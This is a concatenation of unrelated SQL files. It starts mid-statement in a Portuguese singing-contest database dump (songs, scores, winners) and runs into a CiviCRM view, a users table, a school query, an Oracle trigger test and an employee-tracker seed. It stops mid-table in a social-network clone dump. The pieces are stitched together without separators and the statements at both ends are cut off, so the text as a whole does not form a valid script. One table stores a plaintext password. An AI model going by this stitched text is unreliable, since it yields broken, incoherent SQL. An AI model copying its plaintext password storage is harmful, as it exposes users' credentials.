'BRA'), (1489, 'Gian e Giovani', 4202, 'MIL CORAÇÕES', 'Já faz tanto tempo que saí...', 'BRA'), (1490, 'Sem Compromisso', 4203, 'MINHA NASCENTE', 'Sempre que eu olho pra você', 'BRA'), (1491, 'Os Travessos', 4204, 'NEM TUDO ESTÁ PERDIDO', 'Nem tudo está perdido', 'BRA'), (1492, 'Sandy e Júnior', 4205, 'NO FUNDO DO CORAÇÃO', 'Eu quero ser um lindo sonho pro teu coração', 'BRA'), (1493, 'Martinho da Vila', 4206, 'O SAMBA DO TRABALHADOR', 'Na segunda-feira, não vou trabalhar', 'BRA'), (1494, 'Kiloucura', 4207, 'PELA VIDA INTEIRA', 'Quero ter você custe o que...', 'BRA'), (1495, 'Zezé Di Camargo e Luciano', 4208, 'PIOR É TE PERDER', 'Quanta gente a gente vive', 'BRA'), (1496, 'Jerry Adriani', 4210, 'QUERIDA', 'Querida quero lhe dizer que...', 'BRA'), (1497, 'Sandra de Sá', 4211, 'RETRATOS E CANÇÕES', 'Hoje eu me peguei', 'BRA'), (1498, 'Cidade Negra', 4212, 'SÁBADO À NOITE', 'Todo mundo espera alguma coisa', 'BRA'), (1499, 'Jota Quest', 4213, 'SEMPRE ASSIM', 'Sete e quinze eu acordo e...', 'BRA'), (1500, 'Roupa Nova', 4214, 'SENSUAL', 'Nada a dizer antes de sentir', 'BRA'), (1501, 'Leandro e Leonardo', 4215, 'SOLIDÃO POR PERTO', 'Um dia só é muito pouco...', 'BRA'), (1502, 'Chitãozinho e Xororó', 4216, 'TE ESQUECER É IMPOSSÍVEL (NOT THAT DIFFERENT)', 'Você ainda nem me disse por que tudo', 'BRA'), (1503, 'Elis Regina', 4219, 'VELHA ROUPA COLORIDA', 'Você não sente, não vê', 'BRA'), (1504, 'Ed Motta', 4220, 'VOCÊ MENTIU PRA MIM', 'É um absurdo quase o fim', 'BRA'), (1505, 'Agostinho dos Santos', 4221, 'A FELICIDADE', 'Tristeza não tem fim felicidade', 'BRA'), (1506, 'Wando', 4222, 'A PRÓXIMA VÍTIMA', 'Quem é que está fazendo amor', 'BRA'), (1507, 'José Augusto', 4223, 'ALMA E CORAÇÃO', 'Quem é você que conquistou...', 'BRA'), (1508, 'Marcello Marcky', 4224, 'ALMA METADE', 'Sei que um dia eu vou encontrar', 'BRA'), (1509, 'Wando', 4225, 'AQUELE AMOR QUE FAZ GOSTOSO ME DEIXOU', 'Eu era tão feliz eu tinha um grande a', 'BRA'), (1510, 'Chitãozinho e Xororó', 4226, 'ATÉ QUE TE CONHECI', 'Eu vivia tão contente, tão alegre e', 'BRA'), (1511, 'Negritude Júnior', 4227, 'BOM DIA', 'A melhor coisa do mundo é...', 'BRA'), (1512, 'Gian e Giovani', 4228, 'CAÍ NO LAÇO', 'Caí no laço no laço do seu...', 'BRA'), (1513, 'Amado Batista', 4230, 'COMO NA PRIMEIRA VEZ', 'Quando o amor nos acontece', 'BRA'), (1514, 'Paulo Ricardo', 4231, 'COMO SE FOSSE A PRIMEIRA VEZ', 'Desde que eu te conheci', 'BRA'), (1515, 'Daniel', 4232, 'DAQUI NÃO SAIO', 'Eu já fiquei prisioneiro do seu coração', 'BRA'), (1516, 'Rick e Renner', 4233, 'ENROSCA, ENROSCA', 'Se enrosca meu amor se enrosca em mim', 'BRA'), (1517, 'Reginaldo Rossi', 4234, 'EU DEVIA TE ODIAR', 'Eu devia te odiar', 'BRA'), (1518, 'Katinguelê', 4236, 'INARAÍ', 'Seu corpo é o mar por onde...', 'BRA'), (1519, 'Elymar Santos', 4237, 'JAMAIS DEIXEI DE AMAR VOCÊ', 'Tá certo, não tenho palavras pra me', 'BRA'), (1520, 'Leandro e Leonardo', 4238, 'LÁGRIMAS DO CÉU', 'Desde que se foi nunca mais...', 'BRA'), (1521, 'Simone', 4239, 'LOCA', 'Loca loca al sentirme', 'ESP'), (1522, 'Os Travessos', 4240, 'MARAVILHA TE AMAR', 'Por que você não larga', 'BRA'), (1523, 'Sampa Crew', 4241, 'ME DÊ UMA CHANCE', 'Amor escrevo essa carta e me abro', 'BRA'), (1524, 'Daniela Mercury', 4242, 'MINAS COM BAHIA', 'Sacudir estrelas despertar...', 'BRA'), (1525, 'Cleiton e Camargo', 4243, 'NA HORA DE AMAR', 'Seu olhar sempre está muito longe', 'BRA'), (1526, 'Rick e Renner', 4244, 'O QUE É QUE ELA TEM!', 'Já sofri por ela já bebi por ela', 'BRA'), (1527, 'Cleiton e Camargo', 4245, 'OUTRA CHANCE', 'Se você está sozinha em sua casa', 'BRA'), (1528, 'Raça Negra', 4246, 'PERDI VOCÊ', 'Hoje me lembro com tristeza', 'BRA'), (1529, 'Gian e Giovani', 4248, 'PROCURANDO AMOR', 'Eu ando procurando amor por...', 'BRA'), (1530, 'Maurício Mattar', 4249, 'QUEM MANDOU!', 'Quem mandou você gostar de mim', 'BRA'), (1531, 'Fagner-Zezé e Luciano', 4250, 'RETROVISOR', 'Onde a máquina me leva não há nada', 'BRA'), (1532, 'Terrasamba', 4251, 'ROMÂNTICO LÍRICO', 'Você já tá careca de saber', 'BRA'), (1533, 'Chrystian e Ralf', 4252, 'SEM DOCUMENTO', 'Deixa-me atravessar o vento sem documento', 'BRA'), (1534, 'Michael Sullivan', 4253, 'SEMPRE VOU TE AMAR', 'Eu preciso de você', 'BRA'), (1535, 'Evaldo Braga', 4254, 'SORRIA, SORRIA', 'Sorria meu bem Sorria', 'BRA'), (1536, 'Grupo Raça', 4255, 'TE AMO', 'Eu sei... Que eu te amo demais...', 'BRA'), (1537, 'Harmadilha', 4256, 'TEMPESTADE', 'Nem o céu nem a dor nem as...', 'BRA'), (1538, 'Fundo de Quintal', 4258, 'VERDADEIRA CHAMA', 'Guiding dingue digueô... Oba... Quem ama', 'BRA'), (1539, 'Leandro e Leonardo', 4259, 'VIÚVA NOVA', 'Desce uma loira bem gelada...', 'BRA'), (1540, 'Banda Magníficos', 4260, 'VOLTE PRA MIM', 'Se me amas abra logo o jogo', 'BRA'), (1541, 'Jota Quest', 6107, 'O QUE EU TAMBÉM NÃO ENTENDO', 'Essa não é mais uma carta de...', 'BRA'), (1542, 'Zé Ramalho', 15806, 'BATENDO NA PORTA DO CÉU', 'Uhhh uhhh... Mãe tire o distintivo de mim', 'BRA'), (1543, 'Roberto Carlos', 15962, 'AMOR PERFEITO', 'Fecho os olhos pra não ver passar o tempo', 'BRA'), (1544, 'Henrique e Juliano', 15963, 'ATÉ VOCÊ VOLTAR', 'Aqui sentado nessa mesa só o copo de cerveja', 'BRA'), (1545, 'Paula Fernandes', 15974, 'PIRAÇÃO', 'Não sei o que faço perdi o juízo', 'BRA'), (1546, 'Thaeme e Thiago', 16014, 'PRA TER VOCÊ AQUI', 'Iê iê iê iê... É madrugada quatro horas da manhã', 'BRA'), (1547, 'Marília Mendonça', 16041, 'ALÔ PORTEIRO', 'Pegue suas coisas que estão aqui', 'BRA'), (1548, 'Anderson Freire', 16073, 'RARIDADE', 'Não consigo ir além do teu olhar', 'BRA'), (1549, 'Anavitória', 16086, 'AGORA EU QUERO IR', 'Encontrei descanso em você me arquitetei', 'BRA'), (1550, 'Ludmilla', 16088, 'BOM', 'Uma taça de Chandon um calor no edredom', 'BRA'), (1551, 'Adele', 19362, 'HELLO', 'Hello it''s me ...', 'EUA'), (1552, 'Zé Ramalho', 4281, 'MISTÉRIOS DA MEIA NOITE', 'Mistérios da meia noite que voam longe', 'BRA'), (1553, 'Jota Quest', 4287, 'O VENTO', 'Voe por todo mar e volte aqui...', 'BRA'), (1554, 'Robbie Williams', 4859, 'ANGELS', 'I sit and wait does an angel contemplate my', 'EUA'), (1555, 'Aerosmith', 4909, 'I DON''T WANT TO MISS A THING', 'I could stay awake just to hear you', 'EUA'), (1556, 'Bonnie Tyler', 4985, 'TOTAL ECLIPSE OF THE HEART', 'Turn around every now and then', 'EUA'), (1557, 'Sandy e Júnior', 6554, 'SUPER HEROI (NÃO É FÁCIL)', 'Não quero imitar Deus ou coisa assim...', 'BRA'), (1558, 'Projota', 16058, 'ELA SÓ QUER PAZ', 'Ela é um filme de ação com vários finais', 'BRA'), (1559, 'Engenheiros do Hawaii', 16106, 'PARABÓLICA', 'Ela para e fica ali parada', 'BRA'), (1560, 'Victor e Léo - Victor Freitas e Felipe', 16118, 'VAI ME PERDOANDO', 'Vai me perdoando esse meu jeito estranho', 'BRA'), (1561, 'John Cale', 19176, 'HALLELUJAH', 'I´ve heard there was a secret...', 'EUA'), (1562, 'Coldplay', 19558, 'THE SCIENTIST', 'Come up to meet you tell you I´m sorry', 'EUA'); -- -------------------------------------------------------- -- -- Estrutura da tabela `tb_lista_secundaria` -- CREATE TABLE IF NOT EXISTS `tb_lista_secundaria` ( `idListaPrincipal` int(11) NOT NULL AUTO_INCREMENT, `interprete` varchar(50) COLLATE utf8_unicode_ci NOT NULL, `codigo` int(11) NOT NULL, `titulo` varchar(50) COLLATE utf8_unicode_ci NOT NULL, `inicio` varchar(255) COLLATE utf8_unicode_ci NOT NULL, `idioma` varchar(50) COLLATE utf8_unicode_ci NOT NULL, PRIMARY KEY (`idListaPrincipal`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=1 ; -- -------------------------------------------------------- -- -- Estrutura da tabela `tb_mistura` -- CREATE TABLE IF NOT EXISTS `tb_mistura` ( `idMistura` int(11) NOT NULL AUTO_INCREMENT, `idCandidatos` int(11) NOT NULL, PRIMARY KEY (`idMistura`), KEY `idCandidatos` (`idCandidatos`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=21 ; -- -- Extraindo dados da tabela `tb_mistura` -- INSERT INTO `tb_mistura` (`idMistura`, `idCandidatos`) VALUES (10, 1), (9, 2), (7, 3), (8, 4), (16, 5), (20, 6), (11, 7), (3, 8), (2, 9), (15, 10), (14, 11), (17, 12), (18, 13), (1, 14), (19, 15), (5, 16), (13, 17), (4, 18), (6, 19), (12, 20); -- -------------------------------------------------------- -- -- Estrutura da tabela `tb_musicas` -- CREATE TABLE IF NOT EXISTS `tb_musicas` ( `idMusicas` int(11) NOT NULL AUTO_INCREMENT, `idCandidatos` int(11) NOT NULL, `idListaPrincipal` int(11) NOT NULL, PRIMARY KEY (`idMusicas`), KEY `idCandidatos` (`idCandidatos`), KEY `idListaPrincipal` (`idListaPrincipal`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=81 ; -- -- Extraindo dados da tabela `tb_musicas` -- INSERT INTO `tb_musicas` (`idMusicas`, `idCandidatos`, `idListaPrincipal`) VALUES (1, 1, 1), (2, 1, 2), (3, 1, 3), (4, 1, 4), (5, 2, 5), (6, 2, 6), (7, 2, 7), (8, 2, 8), (9, 3, 9), (10, 3, 10), (11, 3, 11), (12, 3, 12), (13, 4, 13), (14, 4, 14), (15, 4, 15), (16, 4, 16), (17, 5, 17), (18, 5, 18), (19, 5, 19), (20, 5, 20), (21, 6, 21), (22, 6, 22), (23, 6, 23), (24, 6, 24), (25, 7, 25), (26, 7, 26), (27, 7, 27), (28, 7, 28), (29, 8, 29), (30, 8, 30), (31, 8, 31), (32, 8, 32), (33, 9, 33), (34, 9, 34), (35, 9, 35), (36, 9, 36), (37, 10, 37), (38, 10, 38), (39, 10, 39), (40, 10, 40), (41, 11, 41), (42, 11, 42), (43, 11, 43), (44, 11, 44), (45, 12, 45), (46, 12, 46), (47, 12, 47), (48, 12, 48), (49, 13, 49), (50, 13, 50), (51, 13, 51), (52, 13, 52), (53, 14, 53), (54, 14, 54), (55, 14, 55), (56, 14, 56), (57, 15, 57), (58, 15, 58), (59, 15, 59), (60, 15, 60), (61, 16, 61), (62, 16, 62), (63, 16, 63), (64, 16, 64), (65, 17, 65), (66, 17, 66), (67, 17, 67), (68, 17, 68), (69, 18, 69), (70, 18, 70), (71, 18, 71), (72, 18, 72), (73, 19, 73), (74, 19, 74), (75, 19, 75), (76, 19, 76), (77, 20, 77), (78, 20, 78), (79, 20, 79), (80, 20, 80); -- -------------------------------------------------------- -- -- Estrutura da tabela `tb_pontuacao` -- CREATE TABLE IF NOT EXISTS `tb_pontuacao` ( `idPontuacao` int(11) NOT NULL AUTO_INCREMENT, `idCandidatos` int(11) NOT NULL, `idFases` int(11) NOT NULL, `idCriterios` int(11) NOT NULL, `pontos` float NOT NULL, PRIMARY KEY (`idPontuacao`), KEY `idCandidatos` (`idCandidatos`), KEY `idFases` (`idFases`), KEY `idCriterios` (`idCriterios`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=224 ; -- -- Extraindo dados da tabela `tb_pontuacao` -- INSERT INTO `tb_pontuacao` (`idPontuacao`, `idCandidatos`, `idFases`, `idCriterios`, `pontos`) VALUES (1, 1, 1, 1, 9), (2, 1, 1, 2, 10), (3, 1, 1, 3, 10), (4, 1, 1, 4, 9), (5, 1, 1, 5, 0), (6, 2, 1, 1, 7), (7, 2, 1, 2, 0), (8, 2, 1, 3, 8), (9, 2, 1, 4, 9), (10, 2, 1, 5, 10), (11, 3, 1, 1, 8), (12, 3, 1, 2, 8), (13, 3, 1, 3, 7), (14, 3, 1, 4, 5), (15, 3, 1, 5, 6.8), (16, 4, 1, 1, 9), (17, 4, 1, 2, 10), (18, 4, 1, 3, 9), (19, 4, 1, 4, 9), (20, 4, 1, 5, 7.8), (21, 5, 1, 1, 10), (22, 5, 1, 2, 7), (23, 5, 1, 3, 8), (24, 5, 1, 4, 7), (25, 5, 1, 5, 6.9), (26, 6, 1, 1, 8), (27, 6, 1, 2, 6), (28, 6, 1, 3, 10), (29, 6, 1, 4, 5), (30, 6, 1, 5, 5.9), (31, 7, 1, 1, 8), (32, 7, 1, 2, 9), (33, 7, 1, 3, 8.8), (34, 7, 1, 4, 7), (35, 7, 1, 5, 6.9), (36, 8, 1, 1, 9), (37, 8, 1, 2, 5), (38, 8, 1, 3, 5), (39, 8, 1, 4, 8), (40, 8, 1, 5, 7.5), (41, 9, 1, 1, 8), (42, 9, 1, 2, 7), (43, 9, 1, 3, 6), (44, 9, 1, 4, 5), (45, 9, 1, 5, 4), (46, 10, 1, 1, 5), (47, 10, 1, 2, 8), (48, 10, 1, 3, 7), (49, 10, 1, 4, 7), (50, 10, 1, 5, 7), (51, 11, 1, 1, 7), (52, 11, 1, 2, 8), (53, 11, 1, 3, 5), (54, 11, 1, 4, 8), (55, 11, 1, 5, 10), (56, 12, 1, 1, 6), (57, 12, 1, 2, 5), (58, 12, 1, 3, 7), (59, 12, 1, 4, 8), (60, 12, 1, 5, 6), (61, 13, 1, 1, 7), (62, 13, 1, 2, 8), (63, 13, 1, 3, 10), (64, 13, 1, 4, 5.5), (65, 13, 1, 5, 5.9), (66, 14, 1, 1, 6.9), (67, 14, 1, 2, 7.8), (68, 14, 1, 3, 8), (69, 14, 1, 4, 10), (70, 14, 1, 5, 8), (71, 15, 1, 1, 5), (72, 15, 1, 2, 5), (73, 15, 1, 3, 9), (74, 15, 1, 4, 8), (75, 15, 1, 5, 7), (76, 16, 1, 1, 5), (77, 16, 1, 2, 8), (78, 16, 1, 3, 7), (79, 16, 1, 4, 5), (80, 16, 1, 5, 10), (81, 17, 1, 1, 5), (82, 17, 1, 2, 9), (83, 17, 1, 3, 7), (84, 17, 1, 4, 8), (85, 17, 1, 5, 7), (86, 18, 1, 1, 8), (87, 18, 1, 2, 8), (88, 18, 1, 3, 8), (89, 18, 1, 4, 8), (90, 18, 1, 5, 9), (91, 19, 1, 1, 7), (92, 19, 1, 2, 8), (93, 19, 1, 3, 9), (94, 19, 1, 4, 9), (95, 19, 1, 5, 5), (96, 20, 1, 1, 5), (97, 20, 1, 2, 6), (98, 20, 1, 3, 9), (99, 20, 1, 4, 8), (100, 20, 1, 5, 7), (101, 1, 2, 1, 10), (102, 1, 2, 2, 10), (103, 1, 2, 3, 10), (104, 1, 2, 5, 10), (105, 7, 2, 1, 10), (106, 7, 2, 2, 8), (107, 7, 2, 3, 9), (108, 7, 2, 4, 5), (109, 7, 2, 5, 10), (110, 4, 2, 1, 5), (111, 4, 2, 2, 5), (112, 4, 2, 3, 5), (113, 4, 2, 4, 5), (114, 4, 2, 5, 5), (115, 5, 2, 2, 9.5), (116, 5, 2, 2, 3), (117, 5, 2, 3, 10), (118, 5, 2, 4, 2), (119, 5, 2, 5, 5), (120, 2, 2, 1, 7), (121, 2, 2, 2, 8.5), (122, 2, 2, 3, 7.5), (123, 2, 2, 4, 8), (124, 2, 2, 5, 7.5), (125, 11, 2, 1, 8.3), (126, 11, 2, 2, 8), (127, 11, 2, 3, 5), (128, 11, 2, 4, 10), (129, 11, 2, 5, 6), (130, 18, 2, 1, 5.5), (131, 18, 2, 2, 8), (132, 18, 2, 3, 7), (133, 18, 2, 4, 9.8), (134, 18, 2, 5, 7), (135, 13, 2, 1, 8.8), (136, 13, 2, 2, 8), (137, 13, 2, 3, 4), (138, 13, 2, 4, 7.3), (139, 13, 2, 5, 9), (140, 14, 2, 1, 7.7), (141, 14, 2, 2, 8), (142, 14, 2, 3, 10), (143, 14, 2, 4, 6.9), (144, 14, 2, 5, 5), (145, 17, 2, 1, 4.5), (146, 17, 2, 2, 8), (147, 17, 2, 3, 8), (148, 17, 2, 4, 7), (149, 17, 2, 5, 10), (150, 1, 2, 4, 10), (199, 1, 3, 1, 10), (200, 1, 3, 2, 10), (201, 1, 3, 3, 0), (202, 1, 3, 4, 10), (203, 13, 3, 1, 10), (204, 13, 3, 2, 10), (205, 13, 3, 3, 8), (206, 13, 3, 4, 5), (207, 13, 3, 5, 7), (208, 2, 3, 1, 9), (209, 2, 3, 2, 9), (210, 2, 3, 3, 8), (211, 2, 3, 4, 10), (212, 2, 3, 5, 9), (213, 18, 3, 1, 10), (214, 18, 3, 2, 5), (215, 18, 3, 3, 6), (216, 18, 3, 4, 7.5), (217, 18, 3, 5, 6.6), (218, 7, 3, 1, 10), (219, 7, 3, 2, 8), (220, 7, 3, 3, 4.5), (221, 7, 3, 4, 5.9), (222, 7, 3, 5, 6), (223, 1, 3, 5, 0); -- -------------------------------------------------------- -- -- Estrutura da tabela `tb_vencedores` -- CREATE TABLE IF NOT EXISTS `tb_vencedores` ( `idVencedores` int(11) NOT NULL AUTO_INCREMENT, `idCandidatos` int(11) NOT NULL, `grupo` varchar(1) COLLATE utf8_unicode_ci NOT NULL, PRIMARY KEY (`idVencedores`), KEY `idCandidatos` (`idCandidatos`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=4 ; -- -- Extraindo dados da tabela `tb_vencedores` -- INSERT INTO `tb_vencedores` (`idVencedores`, `idCandidatos`, `grupo`) VALUES (1, 1, 'A'), (2, 2, 'A'), (3, 13, 'B'); -- -- Constraints for dumped tables -- -- -- Limitadores para a tabela `tb_duplas` -- ALTER TABLE `tb_duplas` ADD CONSTRAINT `tb_duplas_ibfk_1` FOREIGN KEY (`idFases`) REFERENCES `tb_fases` (`idFases`) ON DELETE CASCADE ON UPDATE CASCADE, ADD CONSTRAINT `tb_duplas_ibfk_2` FOREIGN KEY (`idCandidatos`) REFERENCES `tb_candidatos` (`idCandidatos`) ON DELETE CASCADE ON UPDATE CASCADE; -- -- Limitadores para a tabela `tb_final` -- ALTER TABLE `tb_final` ADD CONSTRAINT `tb_final_ibfk_1` FOREIGN KEY (`idFases`) REFERENCES `tb_fases` (`idFases`) ON DELETE CASCADE ON UPDATE CASCADE, ADD CONSTRAINT `tb_final_ibfk_2` FOREIGN KEY (`idCandidatos`) REFERENCES `tb_candidatos` (`idCandidatos`) ON DELETE CASCADE ON UPDATE CASCADE; -- -- Limitadores para a tabela `tb_forma_duplas` -- ALTER TABLE `tb_forma_duplas` ADD CONSTRAINT `tb_forma_duplas_ibfk_1` FOREIGN KEY (`idFases`) REFERENCES `tb_fases` (`idFases`) ON DELETE CASCADE ON UPDATE CASCADE, ADD CONSTRAINT `tb_forma_duplas_ibfk_2` FOREIGN KEY (`idCandidatos`) REFERENCES `tb_candidatos` (`idCandidatos`) ON DELETE CASCADE ON UPDATE CASCADE; -- -- Limitadores para a tabela `tb_grupos` -- ALTER TABLE `tb_grupos` ADD CONSTRAINT `tb_grupos_ibfk_1` FOREIGN KEY (`idCandidatos`) REFERENCES `tb_candidatos` (`idCandidatos`) ON DELETE CASCADE ON UPDATE CASCADE; -- -- Limitadores para a tabela `tb_jurados` -- ALTER TABLE `tb_jurados` ADD CONSTRAINT `tb_jurados_ibfk_1` FOREIGN KEY (`idCriterios`) REFERENCES `tb_criterios` (`idCriterios`) ON DELETE CASCADE ON UPDATE CASCADE; -- -- Limitadores para a tabela `tb_mistura` -- ALTER TABLE `tb_mistura` ADD CONSTRAINT `tb_mistura_ibfk_1` FOREIGN KEY (`idCandidatos`) REFERENCES `tb_candidatos` (`idCandidatos`) ON DELETE CASCADE ON UPDATE CASCADE; -- -- Limitadores para a tabela `tb_musicas` -- ALTER TABLE `tb_musicas` ADD CONSTRAINT `tb_musicas_ibfk_2` FOREIGN KEY (`idListaPrincipal`) REFERENCES `tb_lista_principal` (`idListaPrincipal`) ON DELETE CASCADE ON UPDATE CASCADE, ADD CONSTRAINT `tb_musicas_ibfk_1` FOREIGN KEY (`idCandidatos`) REFERENCES `tb_candidatos` (`idCandidatos`) ON DELETE CASCADE ON UPDATE CASCADE; -- -- Limitadores para a tabela `tb_pontuacao` -- ALTER TABLE `tb_pontuacao` ADD CONSTRAINT `tb_pontuacao_ibfk_1` FOREIGN KEY (`idCandidatos`) REFERENCES `tb_candidatos` (`idCandidatos`) ON DELETE CASCADE ON UPDATE CASCADE, ADD CONSTRAINT `tb_pontuacao_ibfk_2` FOREIGN KEY (`idFases`) REFERENCES `tb_fases` (`idFases`) ON DELETE CASCADE ON UPDATE CASCADE, ADD CONSTRAINT `tb_pontuacao_ibfk_3` FOREIGN KEY (`idCriterios`) REFERENCES `tb_criterios` (`idCriterios`) ON DELETE CASCADE ON UPDATE CASCADE; -- -- Limitadores para a tabela `tb_vencedores` -- ALTER TABLE `tb_vencedores` ADD CONSTRAINT `tb_vencedores_ibfk_1` FOREIGN KEY (`idCandidatos`) REFERENCES `tb_candidatos` (`idCandidatos`) ON DELETE CASCADE ON UPDATE CASCADE; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
CREATE VIEW `notes_for_contributions` AS SELECT `CN`.`contact_id` AS `External ID`, IFNULL(`N`.`note`, '') AS `Note Text`, CAST(`N`.`modified_date` AS DATE) AS `Note Date`, IFNULL(`N`.`subject`, '') AS `Note Purpose`, `CN`.`id` AS `Contribution ID`, `CN`.`receive_date` AS `receive_date`, `CN`.`total_amount` AS `total_amount` FROM (`civicrm_note` `N` JOIN `civicrm_contribution` `CN` ON ((`N`.`entity_id` = `CN`.`id`))) WHERE (`N`.`entity_table` = 'civicrm_contribution')
/* MySQL Data Transfer Source Host: localhost Source Database: simplecontroller Target Host: localhost Target Database: simplecontroller Date: 2015/11/27 22:34:58 */ SET FOREIGN_KEY_CHECKS=0; -- ---------------------------- -- Table structure for users -- ---------------------------- CREATE TABLE `users` ( `id` varchar(32) NOT NULL, `userName` varchar(32) DEFAULT NULL, `password` varchar(20) DEFAULT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; -- ---------------------------- -- Records -- ---------------------------- INSERT INTO `users` VALUES ('402881e75033c8c2015033cc90910000', '123456', '123456');
/** * Creates table matching Illuminate section ids with subjects and travel groups. * When syncing gradebooks, teachers see the Illuminate section id, but not the * local section id which contains the travel group name. This query pulls this * information and presents it in a format teachers can easily use. */ SELECT -- School Name sites.site_name AS "School", -- Course Short Name courses.short_name AS "Course Name", -- Teacher Name users.last_name AS "Teacher Name", -- Illuminate Section ID cube.section_id AS "Illuminate ID", -- Travel Group Name split_part(sec.local_section_id, '-', 1) AS "Travel Group" FROM public.sections sec LEFT JOIN ( SELECT DISTINCT section_id, user_id, site_id, course_id FROM matviews.ss_cube WHERE academic_year = 2016 -- AND (grade_level_id BETWEEN 6 and 9) ) AS cube ON sec.section_id = cube.section_id JOIN public.users users ON cube.user_id = users.user_id JOIN public.sites sites ON cube.site_id = sites.site_id JOIN public.courses courses ON cube.course_id = courses.course_id ORDER BY "School", "Course Name", "Illuminate ID"
create trigger Login_actualiza before update of correo on login for each row begin raise_application_error(-20001,'Solo se puede actualizar el correo.' ); end; execute procedure Login_actualiza insert into login(correo, contrasena) values('jose','jjj'); update login set correo='hola' where correo='jose'; delete from login;
DROP DATABASE IF EXISTS employee_trackerDB; CREATE DATABASE employee_trackerDB; USE employee_trackerDB; CREATE TABLE department( id INT NOT NULL AUTO_INCREMENT, name VARCHAR(30), PRIMARY KEY (id) ); CREATE TABLE role ( id INT NOT NULL AUTO_INCREMENT, title VARCHAR(30), salary DECIMAL(10, 2), department_id INT, PRIMARY KEY (id), FOREIGN KEY (department_id) REFERENCES department (id) ); CREATE TABLE employee ( id INT NOT NULL AUTO_INCREMENT, firstname VARCHAR(30), lastname VARCHAR(30), role_id INT, manager_id INT, PRIMARY KEY (id), FOREIGN KEY (role_id) REFERENCES role (id), FOREIGN KEY (manager_id) REFERENCES role (id) ); INSERT INTO department (name) VALUES ("Management"); INSERT INTO department (name) VALUES ("Engineering"); INSERT INTO department (name) VALUES ("Sales"); INSERT INTO department (name) VALUES ("Legal"); INSERT INTO department (name) VALUES ("Finance"); INSERT INTO role (title, salary, department_id) VALUES ("Chief Executive Officer", 1000000, 1); INSERT INTO role (title, salary, department_id) VALUES ("Chief Operations Officer", 900000, 1); INSERT INTO role (title, salary, department_id) VALUES ("Chief Financial Officer", 800000, 1); INSERT INTO role (title, salary, department_id) VALUES ("Engineering Manager", 150000, 2); INSERT INTO role (title, salary, department_id) VALUES ("Senior Engineer", 120000, 2); INSERT INTO role (title, salary, department_id) VALUES ("Junior Engineer", 70000, 2); INSERT INTO role (title, salary, department_id) VALUES ("Lead Salesman", 80000, 3); INSERT INTO role (title, salary, department_id) VALUES ("Salesman", 60000, 3); INSERT INTO role (title, salary, department_id) VALUES ("Senior Lawyer", 120000, 4); INSERT INTO role (title, salary, department_id) VALUES ("Lawyer", 70000, 4); INSERT INTO role (title, salary, department_id) VALUES ("Manager of Finance", 90000, 5); INSERT INTO role (title, salary, department_id) VALUES ("Accountant", 750000, 5); INSERT INTO employee (firstname, lastname, role_id, manager_id) VALUES ("Abdiwahab", "Ahmed", 1, NULL); INSERT INTO employee (firstname, lastname, role_id, manager_id) VALUES ("Justin", "Trudeau", 2, 1); INSERT INTO employee (firstname, lastname, role_id, manager_id) VALUES ("Angela", "Merkel", 3, 2); INSERT INTO employee (firstname, lastname, role_id, manager_id) VALUES ("Emmanuel", "Macron", 4, 1); INSERT INTO employee (firstname, lastname, role_id, manager_id) VALUES ("Xi", "Jinping", 5, 4); INSERT INTO employee (firstname, lastname, role_id, manager_id) VALUES ("Tayyip", "Erdogan", 6, 5); INSERT INTO employee (firstname, lastname, role_id, manager_id) VALUES ("Vladimir", "Putin", 7, 2); INSERT INTO employee (firstname, lastname, role_id, manager_id) VALUES ("Donald", "Trump", 8, 7); INSERT INTO employee (firstname, lastname, role_id, manager_id) VALUES ("Shinzo", "Abe", 9, 1); INSERT INTO employee (firstname, lastname, role_id, manager_id) VALUES ("Boris", "Johnson", 10, 9); INSERT INTO employee (firstname, lastname, role_id, manager_id) VALUES ("Narendra", "Modi", 11, 3); INSERT INTO employee (firstname, lastname, role_id, manager_id) VALUES ("Mohammmad", "Salman", 12, 11);
-- phpMyAdmin SQL Dump -- version 4.5.1 -- http://www.phpmyadmin.net -- -- Host: 127.0.0.1 -- Generation Time: 23-Out-2016 às 03:35 -- Versão do servidor: 10.1.13-MariaDB -- PHP Version: 5.6.21 SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; SET time_zone = "+00:00"; /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8mb4 */; -- -- Database: `facebook` -- -- -------------------------------------------------------- -- -- Estrutura da tabela `grupos` -- CREATE TABLE `grupos` ( `id` int(11) UNSIGNED NOT NULL, `id_usuario` int(11) DEFAULT NULL, `titulo` varchar(100) DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8; -- -- Extraindo dados da tabela `grupos` -- INSERT INTO `grupos` (`id`, `id_usuario`, `titulo`) VALUES (2, 1, 'Grupo de Teste'); -- -------------------------------------------------------- -- -- Estrutura da tabela `grupos_membros` -- CREATE TABLE `grupos_membros` ( `id` int(11) UNSIGNED NOT NULL, `id_grupo` int(11) DEFAULT NULL, `id_usuario` int(11) DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8; -- -- Extraindo dados da tabela `grupos_membros` -- INSERT INTO `grupos_membros` (`id`, `id_grupo`, `id_usuario`) VALUES (1, 2, 1), (2, 2, 2), (3, 2, 3); -- -------------------------------------------------------- -- -- Estrutura da tabela `posts` -- CREATE TABLE `posts` ( `id` int(11) UNSIGNED NOT NULL, `id_usuario` int(11) DEFAULT NULL, `data_criacao` datetime DEFAULT NULL, `tipo` varchar(50) DEFAULT NULL, `texto` text, `url` varchar(50) DEFAULT NULL, `id_grupo` 